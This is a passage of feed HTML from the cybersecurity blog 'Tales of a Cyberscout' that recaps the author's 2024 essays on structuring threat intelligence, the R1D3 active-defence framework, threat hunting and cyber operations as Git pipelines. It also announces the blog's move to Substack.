src="https://substackcdn.com/image/fetch/$s_!h3I0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png" width="619" height="365.4612546125461" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:1355,&quot;resizeWidth&quot;:619,&quot;bytes&quot;:192175,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!h3I0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 424w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 848w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 1272w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Left and Right of Boom. Cyber Defence Matrix p73.</figcaption></figure></div><p>To build awareness of any type, you need the ability to convert data into information, the latter into knowledge and this, finally, into impact.</p><p>This is easier said than done.</p><p><em>As T. S. Eliot put it:</em></p><div class="pullquote"><p>Where is all the knowledge we lost with information?</p></div><p>In my career, I&#8217;ve observed many different ways of structuring threat intelligence to inform structural and situational awareness, but in most cases, I&#8217;ve seen two wrong approaches that <strong>fundamentally undermine</strong> the success of your threat intelligence, threat hunting, detection engineering and incident response efforts:</p><ol><li><p><strong>The Rube Goldberg Trap</strong>. Operational chokepoints driven by poor harvesting and delivery of threat-related information and a limited understanding of what threat intelligence can do for you. This leads to over-engineered functions or aspects of your cyber operations, resembling <a href="https://en.wikipedia.org/wiki/Rube_Goldberg_machine">Rube Goldberg Machines</a> that introduce unnecessary complications and deliver very little value.</p></li><li><p><strong>The Spherical Cow Trap</strong>. Threat Intelligence&#8217;s function in the business is structured to solve a problem that (a) <em>doesn&#8217;t address the real problems the business should be solving</em> and (b) <em>introduces new problems in downstream processes due to its inefficiency</em>. This happens because of an oversimplified idea of how information is produced and consumed in cyber operations. You are operating with a model of how your function interacts with the system which is fundamentally wrong. <em>It is a clear example of a disconnect between business needs and technical solutions</em>.</p></li></ol><p>Last year, I tried to propose different solutions to this problem. I was obsessed -and still am- with how to drive meaningful progress (as opposed to naive progress lacking orientation) around the mining, utilization and refinement of threat intelligence for detection engineering, hunting and cyber deception.</p><p>The above took on the more generic shape of the <strong>R1D3 Framework</strong> (Research, Discovery, Disruption and Development) inspired by the ideas previously shared in <a href="https://aimod2.com/">aimod2.com</a>.</p><p>So 2024 was for me a year to mature the ideas I&#8217;ve laid out since 2020, which started with asking myself what are the core principles that drive successful Incident Response and Digital Forensics teams.</p><p>Let me summarize very briefly the articles written last year. I hope you&#8217;ve enjoyed them ;)</p><h3>R1D3 Threat Driven Research Pipeline - Part 1</h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p1?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z7gX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z7gX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg" width="365" height="365" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:365,&quot;bytes&quot;:130862,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:&quot;https://www.quasarops.com/p/r1d3-threat-driven-defence-p1?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true&quot;,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z7gX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Z7gX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175459c6-d59f-4437-838b-feb0705f08af_800x800.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In <a href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p1?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true">R1D3 Threat Driven Research Pipeline - Part 1</a>, we focus on the first phase (Research) of the RIDE Active Defence Framework, emphasizing the importance of efficient research in threat intelligence, specifically extracting meaning from unstructured data like reports and summaries to improve security controls. The article introduces a research data pipeline with steps for collecting, classifying, and analyzing threat information, using Microsoft's report on Volt Typhoon as an example.</p><h3>R1D3 Threat Driven Research Pipeline - Part 2</h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p2?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dJR7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dJR7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg" width="365" height="365" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:365,&quot;bytes&quot;:538235,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:&quot;https://www.quasarops.com/p/r1d3-threat-driven-defence-p2?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true&quot;,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dJR7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!dJR7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8bbdd9-d4a5-4557-a6c5-9796ae6c6def_800x800.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In <a href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p2?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true">R1D3 Threat Driven Research Pipeline - Part 2</a>, we explore the "Analysis" phase of our framework. The article covers entity and relationship extraction, linking these to your specific environment, and deciding whether to investigate further. <strong>This process transforms raw threat data into actionable information for active defence</strong>.</p><h3>The Threat Hunting Pyramid of Pain</h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://www.quasarops.com/p/threat-hunting-pyramid-of-pain?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-eZR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-eZR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg" width="367" height="367" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:367,&quot;bytes&quot;:92306,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:&quot;https://www.quasarops.com/p/threat-hunting-pyramid-of-pain?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true&quot;,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-eZR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!-eZR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0981fbb7-72b7-40d3-867b-74af76f8e0ea_800x800.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><a href="https://www.quasarops.com/p/threat-hunting-pyramid-of-pain?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true">The Threat Hunting Pyramid of Pain</a> presents a novel approach to threat hunting and analysis called the Intel-Driven Data Analysis (IDDA) Pyramid of Pain. A nine-step process, starting with understanding the context of a threat, extracting key indicators and highlighting the importance of assessing the organization's own environment, including its attack surface, vulnerabilities, and security controls. Finally, it advocates for proactive defence by simulating attacks and building predictive models to anticipate future threats.</p><h3>Cyberops as Git Pipelines</h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://www.quasarops.com/p/cyberops-as-git-pipelines?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZrJS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZrJS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg" width="363" height="363" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:363,&quot;bytes&quot;:91818,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:&quot;https://www.quasarops.com/p/cyberops-as-git-pipelines?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true&quot;,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZrJS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ZrJS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0589f9b4-f564-4f99-9148-dcd73bbc5b69_800x800.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In <a href="https://www.quasarops.com/p/cyberops-as-git-pipelines?r=4xn9ph&amp;utm_campaign=post&amp;utm_medium=web&amp;showWelcomeOnShare=true">Cyberops as Git Pipelines</a>, we ask ourselves what would it look like if your cybersecurity operations pipeline functioned like a Git repository. Each team acting as a branch, merging their insights and actions into a "main" pipeline to drive real-world impact. We propose a "Git-inspired" approach to scalable cyber operations.</p><h2>Oh, you noticed?</h2><p>In case it wasn&#8217;t already obvious, yes, <em>I changed from Ghost to Substack</em>. There was no point in me forking out significant $$$ each month to maintain a free site. Substack allows me to share my ideas for a much lower fee and comes with an entire ecosystem that is quite interesting.</p><p>Writing is a hobby for me. I need to reduce friction to the minimum in order to focus on what matters most: unfolding ideas about resilient cyber systems, active defence and tech leadership.</p><div class="pullquote"><p>I encourage you to check your Spam or Junk folder for any newsletter emails from the Tales of a Cyberscout (quasarops.com) that may have been misplaced by the gods of the metaverse</p></div><h2>So what&#8217;s next man?</h2><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://www.quasarops.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption"><strong>Thanks for reading Tales of a Cyberscout!</strong> Subscribe for free to receive new posts and support my work.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><em>Keep an eye out for the exclusive Subscriber Chat I will kick off any time soon. A place for the Tales of a Cyberscout readership to share ideas and contribute to discussion topics.</em></p><p>I wish you all a wonderful 2025 and flourishing careers!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Cyber Operations as Git Flows]]></title><description><![CDATA[What if your cybersecurity operations 